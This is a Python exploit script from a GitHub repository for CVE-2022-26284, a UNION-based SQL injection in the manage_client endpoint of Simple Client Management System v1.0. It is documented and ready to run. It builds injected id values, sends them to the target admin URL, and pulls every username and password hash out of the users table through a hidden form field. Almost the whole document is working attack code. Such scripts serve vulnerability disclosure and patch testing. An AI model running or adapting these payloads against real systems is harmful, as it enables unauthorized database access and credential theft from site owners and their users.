CVE-2022-26284: SQLi-exploit---Simple-Client-Management-System/manage_client_sqli.py at main · Dir0x/SQLi-exploit---Simple-Client-Management-System
Simple Client Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the manage_client endpoint. The injected value is reflected in the page's hidden `id` input, so an attacker can dump the application's database via crafted HTTP requests; the script below uses UNION-based injection to read usernames and password hashes from the `users` table.
#!/usr/bin/python3
# Exploit Title: SQLi in manage_client endpoint of Simple Client Management System
# Date: 06/11/2021
# Exploit Author: Daniel Haro
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Tested on: debian 10, apache, mysql
from requests import get
from re import search
import argparse
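# The original query behind manage_client returns seven columns, so every UNION
# payload must select exactly seven (the leaked value goes in the first one).
UNION_COLUMNS = 7

# The first column of the UNION ends up in this hidden input, which is where we
# read the leaked value back out of the response.
VALUE_RE = r'<input type="hidden" name="id" value="([^"]*)"'

# Per-request timeout so a dead host does not hang the exploit forever.
REQUEST_TIMEOUT = 10


def build_payload(column: str, where: str = "") -> str:
    """Return the `id` value that UNION-selects *column* from `users`.

    Args:
        column: SQL expression to leak (e.g. ``count(*)``, ``username``).
        where: optional WHERE condition (without the keyword), e.g. ``id=3``.

    The payload closes the original string literal with a quote, pads the UNION
    to UNION_COLUMNS with NULLs, and comments out the rest of the query
    (`-- -`: MySQL requires whitespace after `--`).
    """
    nulls = ",".join(["null"] * (UNION_COLUMNS - 1))
    clause = f" where {where}" if where else ""
    return f"' union select {column},{nulls} from users{clause}-- -"


def extract_value(html: str) -> str:
    """Pull the leaked value out of the hidden `id` input in *html*.

    Raises:
        RuntimeError: if the input is absent, which usually means the target is
            not vulnerable, the URL is wrong, or the column count differs.
    """
    match = search(VALUE_RE, html)
    if match is None:
        raise RuntimeError(
            "hidden 'id' input not found in the response - wrong URL or target not vulnerable?"
        )
    # Strip any CR the server may have emitted inside the attribute.
    return match.group(1).replace("\r", "")


def leak(target: str, column: str, where: str = "") -> str:
    """Send one injected request to *target* and return the leaked *column* value.

    *target* is the site root (with or without trailing slash); the injection
    point is the `id` query parameter of `/admin/?page=client/manage_client`.
    """
    url = target.rstrip("/") + "/admin/?page=client/manage_client"
    # `params` lets requests percent-encode the quote, spaces and commas in the payload.
    resp = get(url, params={"id": build_payload(column, where)}, timeout=REQUEST_TIMEOUT)
    return extract_value(resp.text)


def main() -> None:
    """Dump username/password-hash pairs from the `users` table and print them as a table."""
    parser = argparse.ArgumentParser(
        description="Exploit to SQL injection in manage_client endpoint of Simple Client Management System CMS through id parameter"
    )
    # required=True gives a usage error instead of a TypeError on None + str.
    parser.add_argument("-t", "--target", required=True, help="URL of the victim. Example: http://localhost/")
    opts = parser.parse_args()

    print("Simple Client Management System")
    print("Error based SQL injection exploit")

    user_count = int(leak(opts.target, "count(*)"))

    user_width, hash_width = 30, 32  # 32 fits an MD5 hex digest
    border = "+" + "-" * user_width + "+" + "-" * hash_width + "+"
    print(border)
    print("|" + " username".ljust(user_width) + "|" + " hash".ljust(hash_width) + "|")
    print(border)
    # NOTE: assumes user ids are contiguous 1..count; rows with gaps (deleted users)
    # would be missed and a missing id would raise RuntimeError from extract_value.
    for user_id in range(1, user_count + 1):
        username = leak(opts.target, "username", f"id={user_id}")
        pw_hash = leak(opts.target, "password", f"id={user_id}")
        print("|" + username.ljust(user_width) + "|" + pw_hash.ljust(hash_width) + "|")
    print(border)


if __name__ == "__main__":
    main()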